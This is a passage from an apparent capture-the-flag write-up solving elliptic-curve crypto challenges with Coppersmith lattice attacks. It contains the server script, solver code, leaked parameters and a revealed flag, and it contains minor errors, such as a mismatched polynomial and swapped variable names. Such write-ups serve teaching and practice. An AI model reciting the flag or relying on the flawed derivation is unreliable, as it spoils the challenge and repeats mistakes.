class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="o">-</span> <span class="nb">pow</span><span class="p">(</span><span class="n">x2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">p</span><span class="p">)))</span> <span class="o">%</span> <span class="n">p</span> </span></span><span class="line"><span class="cl"> <span class="n">b</span> <span class="o">=</span> <span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">y1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="o">-</span> <span class="nb">pow</span><span class="p">(</span><span class="n">x1</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="o">-</span> <span class="n">a</span> <span class="o">*</span> <span class="n">x1</span><span class="p">)</span> <span class="o">%</span> <span class="n">p</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span> </span></span></code></pre></div><p>That&rsquo;s all! By having <code>a</code> and <code>b</code>, we can easily recover the <code>key</code> and therefore decrypt the FLAG.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">sha256</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">random</span> <span class="kn">import</span> <span class="n">randint</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="n">getPrime</span><span class="p">,</span> <span class="n">long_to_bytes</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.Padding</span> <span class="kn">import</span> <span class="n">pad</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">iv</span> <span class="o">=</span> <span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">iv</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">key</span> <span class="o">=</span> <span class="n">sha256</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">p</span><span class="p">)))</span><span class="o">.</span><span class="n">digest</span><span class="p">()[:</span><span class="mi">16</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">enc</span> <span class="o">=</span> <span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">enc</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">cipher</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">enc</span><span class="p">))</span> </span></span></code></pre></div><h3 id="results-3">Results</h3> <p>Flag is: <strong>HTB{d3fund_s4v3s_th3_d4y!}</strong></p> <h2 id="elliptic-labyrinth-revenge">Elliptic Labyrinth Revenge</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1wKzblzA6_mYWHLM-CHcUo-6NjIzX9Llc/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> As you navigate through the labyrinth inside the tomb, you encounter GPS inaccuracies that make it difficult to determine the correct path to the exit. Can you overcome the technical issues and use your instincts to find your way out of the maze?</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Crypto</p> </li> <li> <p><strong>Difficulty:</strong> Hard</p> </li> </ul> <p>This challenge is a modified version of <code>Elliptic Labyrinth</code> to force CTF players solve it in intended way.</p> <p>The server script is shown below, which has a bit different from the previous version:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">os</span><span class="o">,</span> <span class="nn">json</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">sha256</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">random</span> <span class="kn">import</span> <span class="n">randint</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="n">getPrime</span><span class="p">,</span> <span class="n">long_to_bytes</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.Padding</span> <span class="kn">import</span> <span class="n">pad</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">sage.all_cmdline</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">secret</span> <span class="kn">import</span> <span class="n">FLAG</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">ECC</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">bits</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">p</span> <span class="o">=</span> <span class="n">getPrime</span><span class="p">(</span><span class="n">bits</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">p</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">b</span> <span class="o">=</span> <span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">p</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">gen_random_point</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">EllipticCurve</span><span class="p">(</span><span class="n">GF</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">p</span><span class="p">),</span> <span class="p">[</span><span class="bp">self</span><span class="o">.</span><span class="n">a</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">b</span><span class="p">])</span><span class="o">.</span><span class="n">random_point</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">menu</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;1. Get parameters of path&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;2. Try to exit the labyrinth&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">option</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s2">&#34;&gt; &#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">option</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">ec</span> <span class="o">=</span> <span class="n">ECC</span><span class="p">(</span><span class="mi">512</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">A</span> <span class="o">=</span> <span class="n">ec</span><span class="o">.</span><span class="n">gen_random_point</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;This is the point you calculated before:&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">({</span><span class="s1">&#39;x&#39;</span><span class="p">:</span> <span class="nb">hex</span><span class="p">(</span><span class="n">A</span><span class="p">[</span><span class="mi">0</span><span class="p">]),</span> <span class="s1">&#39;y&#39;</span><span class="p">:</span> <span class="nb">hex</span><span class="p">(</span><span class="n">A</span><span class="p">[</span><span class="mi">1</span><span class="p">])}))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="kc">True</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">choice</span> <span class="o">=</span> <span class="n">menu</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">choice</span> <span class="o">==</span> <span class="s1">&#39;1&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span> <span class="o">=</span> <span class="n">randint</span><span class="p">(</span><span class="n">ec</span><span class="o">.</span><span class="n">p</span><span class="o">.</span><span class="n">bit_length</span><span class="p">()</span> <span class="o">//</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">ec</span><span class="o">.</span><span class="n">p</span><span class="o">.</span><span class="n">bit_length</span><span class="p">()</span> <span class="o">//</span> <span class="mi">3</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;p&#39;</span><span class="p">:</span> <span class="nb">hex</span><span class="p">(</span><span class="n">ec</span><span class="o">.</span><span class="n">p</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;a&#39;</span><span class="p">:</span> <span class="nb">hex</span><span class="p">(</span><span class="n">ec</span><span class="o">.</span><span class="n">a</span> <span class="o">&gt;&gt;</span> <span class="n">r</span><span class="p">),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;b&#39;</span><span class="p">:</span> <span class="nb">hex</span><span class="p">(</span><span class="n">ec</span><span class="o">.</span><span class="n">b</span> <span class="o">&gt;&gt;</span> <span class="n">r</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">}))</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">choice</span> <span class="o">==</span> <span class="s1">&#39;2&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">iv</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">urandom</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">key</span> <span class="o">=</span> <span class="n">sha256</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">ec</span><span class="o">.</span><span class="n">a</span><span class="p">,</span> <span class="n">ec</span><span class="o">.</span><span class="n">b</span><span class="p">,</span> <span class="n">ec</span><span class="o">.</span><span class="n">p</span><span class="p">)))</span><span class="o">.</span><span class="n">digest</span><span class="p">()[:</span><span class="mi">16</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">flag</span> <span class="o">=</span> <span class="n">pad</span><span class="p">(</span><span class="n">FLAG</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">({</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;iv&#39;</span><span class="p">:</span> <span class="n">iv</span><span class="o">.</span><span class="n">hex</span><span class="p">(),</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;enc&#39;</span><span class="p">:</span> <span class="n">cipher</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span><span class="o">.</span><span class="n">hex</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="p">}))</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Bye.&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">exit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">&#39;__main__&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">main</span><span class="p">()</span> </span></span></code></pre></div><h3 id="problem-statement-4">Problem Statement</h3> <p>The program generates random secret elliptic curve parameters and allows the user to:</p> <ul> <li> <p>Option 1: Obtain the modulus <code>p</code> and a few MSB bits of ECC parameters.</p> </li> <li> <p>Option 2: Provide the encrypted <code>FLAG</code>.</p> </li> </ul> <p>Unlike the previous one, now the server doesn&rsquo;t provide an option to generate random points, instead it gives players only one point at the beginning. The objective is to recover curve&rsquo;s parameters given a single point of the curve, <code>p</code> and the most significant bits of <code>a</code> and <code>b</code>.</p> <h3 id="initial-analysis-5">Initial Analysis</h3> <h4 id="aes-encryption">AES Encryption</h4> <p>Easily see that the AES scheme is normal and therefore we can exploit anything from it. The only way to retrieve the <code>FLAG</code> is finding the key, which means finding the curve&rsquo;s parameters.</p> <h4 id="leak-bits">Leak Bits</h4> <p>For some $170 \leq r \leq 340$, let&rsquo;s define $a_{h}$ and $b_h$ as the $r$ MSB bits of $a$ and $b$, define $a_l$ and $b_l$ as the remaining bits of $a$ and $b$, respectively. By our definition, we have:</p> <p>$a = a_h \times 2^r + a_l$</p> <p>$b = b_h \times 2^r + b_l$</p> <p>Substitute $a$ and $b$ to the Weierstrass elliptic curve equation, we get:</p> <p>$y^2 \equiv x^3 + (2^ra_h + a_l)x + 2^rb_h + b_l \text{ (mod }p)$</p> <p>We define a polynomial $F(\alpha, \beta)$ in $GF(p)$ satifies $F(a_l, b_l) = 0$:</p> <p>$F(\alpha, \beta) = x_P\alpha + \beta + 2^r a_h \times x_P + 2^rb_h\times x_P - y^2_P$</p> <p>where $(x_P, y_P)$ is the known point given by the server at beginning. When having most significant bits of a number known, a typical method to apply is Coppersmith, particularly bivariate polynomial Coppersmith in this time.</p> <h3 id="implementation-and-results">Implementation and Results</h3> <p>By connecting to the server, I received these information:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">p</span> <span class="o">=</span> <span class="mh">0xe3b0aa3465a71f45fdd6350587d041c481ae061401465aa9e089827ac0548728771f6baf095b5f44bb8410dc9709ea22df72bf635f04475fedeb24f13d488ceb</span> </span></span><span class="line"><span class="cl"><span class="n">a_h</span> <span class="o">=</span> <span class="mh">0x3128114d5bdecf9388699fd05d1432d444f9e8bda4e620b13445d6f9705721d7dff1</span> </span></span><span class="line"><span class="cl"><span class="n">b_h</span> <span class="o">=</span> <span class="mh">0x2cf39f8fd105112fdaa7c7144f3e7e7da15e93fa59efc32b2c185bf5151153e7fd07</span> </span></span><span class="line"><span class="cl"><span class="n">x_P</span> <span class="o">=</span> <span class="mh">0x266dd3ba72bad801e16d03509ae1656b0f137c2382f40a420ff90e40f291073b46ae395f2858ccd719299d786c8191796f882daf2a55760d9c58fbcb6c5355da</span> </span></span><span class="line"><span class="cl"><span class="n">y_P</span> <span class="o">=</span> <span class="mh">0x7c24c560a9bf720ff447de5671342787c762508e44a2e269ed0794e5ef33f9014f1dd53d8a3ebcb301d5fecdfde4d2413ee079b0ad8e716729c0123787d7fa4d</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">iv</span> <span class="o">=</span> <span class="s2">&#34;8ace74afe026aab8ff1288a9076141fb&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">enc</span> <span class="o">=</span> <span class="s2">&#34;a07c4ac6d8dc0abe11d955a79e37d8b21721704dfccf6f3938646c74b1c3374f6d0f8e71962e48c405c629533c804ea0&#34;</span> </span></span></code></pre></div><p>The good implementation of multivariate Coppersmith I used is in <a href="https://github.com/defund/coppersmith" target="_blank" rel="noopener">this repo</a> of Defund:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">itertools</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">small_roots</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">bounds</span><span class="p">,</span> <span class="n">m</span><span class="o">=</span><span class="mi">1</span><span class="p">,</span> <span class="n">d</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="ow">not</span> <span class="n">d</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">d</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">degree</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">R</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">base_ring</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">N</span> <span class="o">=</span> <span class="n">R</span><span class="o">.</span><span class="n">cardinality</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">f</span> <span class="o">/=</span> <span class="n">f</span><span class="o">.</span><span class="n">coefficients</span><span class="p">()</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">f</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">change_ring</span><span class="p">(</span><span class="n">ZZ</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">G</span> <span class="o">=</span> <span class="n">Sequence</span><span class="p">([],</span> <span class="n">f</span><span class="o">.</span><span class="n">parent</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">m</span><span class="o">+</span><span class="mi">1</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">base</span> <span class="o">=</span> <span class="n">N</span><span class="o">^</span><span class="p">(</span><span class="n">m</span><span class="o">-</span><span class="n">i</span><span class="p">)</span> <span class="o">*</span> <span class="n">f</span><span class="o">^</span><span class="n">i</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">shifts</span> <span class="ow">in</span> <span class="n">itertools</span><span class="o">.</span><span class="n">product</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="n">d</span><span class="p">),</span> <span class="n">repeat</span><span class="o">=</span><span class="n">f</span><span class="o">.</span><span class="n">nvariables</span><span class="p">()):</span> </span></span><span class="line"><span class="cl"> <span class="n">g</span> <span class="o">=</span> <span class="n">base</span> <span class="o">*</span> <span class="n">prod</span><span class="p">(</span><span class="nb">map</span><span class="p">(</span><span class="n">power</span><span class="p">,</span> <span class="n">f</span><span class="o">.</span><span class="n">variables</span><span class="p">(),</span> <span class="n">shifts</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">G</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">g</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">B</span><span class="p">,</span> <span class="n">monomials</span> <span class="o">=</span> <span class="n">G</span><span class="o">.</span><span class="n">coefficient_matrix</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">monomials</span> <span class="o">=</span> <span class="n">vector</span><span class="p">(</span><span class="n">monomials</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">factors</span> <span class="o">=</span> <span class="p">[</span><span class="n">monomial</span><span class="p">(</span><span class="o">*</span><span class="n">bounds</span><span class="p">)</span> <span class="k">for</span> <span class="n">monomial</span> <span class="ow">in</span> <span class="n">monomials</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">factor</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">factors</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">B</span><span class="o">.</span><span class="n">rescale_col</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">factor</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">B</span> <span class="o">=</span> <span class="n">B</span><span class="o">.</span><span class="n">dense_matrix</span><span class="p">()</span><span class="o">.</span><span class="n">LLL</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">B</span> <span class="o">=</span> <span class="n">B</span><span class="o">.</span><span class="n">change_ring</span><span class="p">(</span><span class="n">QQ</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">factor</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">factors</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">B</span><span class="o">.</span><span class="n">rescale_col</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="mi">1</span><span class="o">/</span><span class="n">factor</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">H</span> <span class="o">=</span> <span class="n">Sequence</span><span class="p">([],</span> <span class="n">f</span><span class="o">.</span><span class="n">parent</span><span class="p">()</span><span class="o">.</span><span class="n">change_ring</span><span class="p">(</span><span class="n">QQ</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">h</span> <span class="ow">in</span> <span class="nb">filter</span><span class="p">(</span><span class="kc">None</span><span class="p">,</span> <span class="n">B</span><span class="o">*</span><span class="n">monomials</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">H</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">h</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">I</span> <span class="o">=</span> <span class="n">H</span><span class="o">.</span><span class="n">ideal</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">I</span><span class="o">.</span><span class="n">dimension</span><span class="p">()</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">H</span><span class="o">.</span><span class="n">pop</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">I</span><span class="o">.</span><span class="n">dimension</span><span class="p">()</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">roots</span> <span class="o">=</span> <span class="p">[]</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">root</span> <span class="ow">in</span> <span class="n">I</span><span class="o">.</span><span class="n">variety</span><span class="p">(</span><span class="n">ring</span><span class="o">=</span><span class="n">ZZ</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">root</span> <span class="o">=</span> <span class="nb">tuple</span><span class="p">(</span><span class="n">R</span><span class="p">(</span><span class="n">root</span><span class="p">[</span><span class="n">var</span><span class="p">])</span> <span class="k">for</span> <span class="n">var</span> <span class="ow">in</span> <span class="n">f</span><span class="o">.</span><span class="n">variables</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">roots</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">root</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">roots</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">[]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="nb">bin</span><span class="p">(</span><span class="n">p</span><span class="p">))</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">bin</span><span class="p">(</span><span class="n">a_h</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">Fp</span> <span class="o">=</span> <span class="n">GF</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">a_h</span><span class="p">,</span> <span class="n">b_h</span><span class="p">,</span> <span class="n">x_P</span><span class="p">,</span> <span class="n">y_P</span> <span class="o">=</span> <span class="nb">map</span><span class="p">(</span><span class="n">Fp</span><span class="p">,</span> <span class="p">[</span><span class="n">a_h</span><span class="p">,</span> <span class="n">b_h</span><span class="p">,</span> <span class="n">x_P</span><span class="p">,</span> <span class="n">y_P</span><span class="p">])</span> </span></span><span class="line"><span class="cl"><span class="n">P</span><span class="o">.&lt;</span><span class="n">alpha</span><span class="p">,</span> <span class="n">beta</span><span class="o">&gt;</span> <span class="o">=</span> <span class="n">PolynomialRing</span><span class="p">(</span><span class="n">Fp</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">F</span> <span class="o">=</span> <span class="n">x_P</span> <span class="o">*</span> <span class="n">alpha</span> <span class="o">+</span> <span class="n">beta</span> <span class="o">+</span> <span class="n">x_P</span><span class="o">^</span><span class="mi">3</span> <span class="o">+</span> <span class="mi">2</span><span class="o">^</span><span class="n">r</span> <span class="o">*</span> <span class="n">a_h</span> <span class="o">*</span> <span class="n">x_P</span> <span class="o">+</span> <span class="mi">2</span><span class="o">^</span><span class="n">r</span> <span class="o">*</span> <span class="n">b_h</span> <span class="o">-</span> <span class="n">y_P</span><span class="o">^</span><span class="mi">2</span> </span></span><span class="line"><span class="cl"><span class="n">roots</span> <span class="o">=</span> <span class="n">small_roots</span><span class="p">(</span><span class="n">F</span><span class="p">,</span> <span class="p">(</span><span class="mi">2</span><span class="o">^</span><span class="n">r</span><span class="p">,</span> <span class="mi">2</span><span class="o">^</span><span class="n">r</span><span class="p">),</span> <span class="n">m</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span> <span class="n">d</span><span class="o">=</span><span class="mi">5</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">a_l</span><span class="p">,</span> <span class="n">b_l</span> <span class="o">=</span> <span class="n">roots</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;a_l = </span><span class="si">{</span><span class="n">a_l</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;b_l = </span><span class="si">{</span><span class="n">b_l</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span></code></pre></div><p>The results:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">a_l</span> <span class="o">=</span> <span class="mi">4090003137759760265604501674930222345811449862978588668280246527938919495</span> </span></span><span class="line"><span class="cl"><span class="n">b_l</span> <span class="o">=</span> <span class="mi">6854882327443898686047723082547152279783184053818145063785025112346556672</span> </span></span></code></pre></div><p>After recovering <code>x_l</code> and <code>y_l</code>, I decrypted the <code>FLAG</code> by this script:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">sha256</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">random</span> <span class="kn">import</span> <span class="n">randint</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="n">getPrime</span><span class="p">,</span> <span class="n">long_to_bytes</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.Padding</span> <span class="kn">import</span> <span class="n">pad</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="n">a_h</span> <span class="o">&lt;&lt;</span> <span class="mi">242</span><span class="p">)</span> <span class="o">+</span> <span class="n">a_l</span> </span></span><span class="line"><span class="cl"><span class="n">b</span> <span class="o">=</span> <span class="p">(</span><span class="n">b_h</span> <span class="o">&lt;&lt;</span> <span class="mi">242</span><span class="p">)</span> <span class="o">+</span> 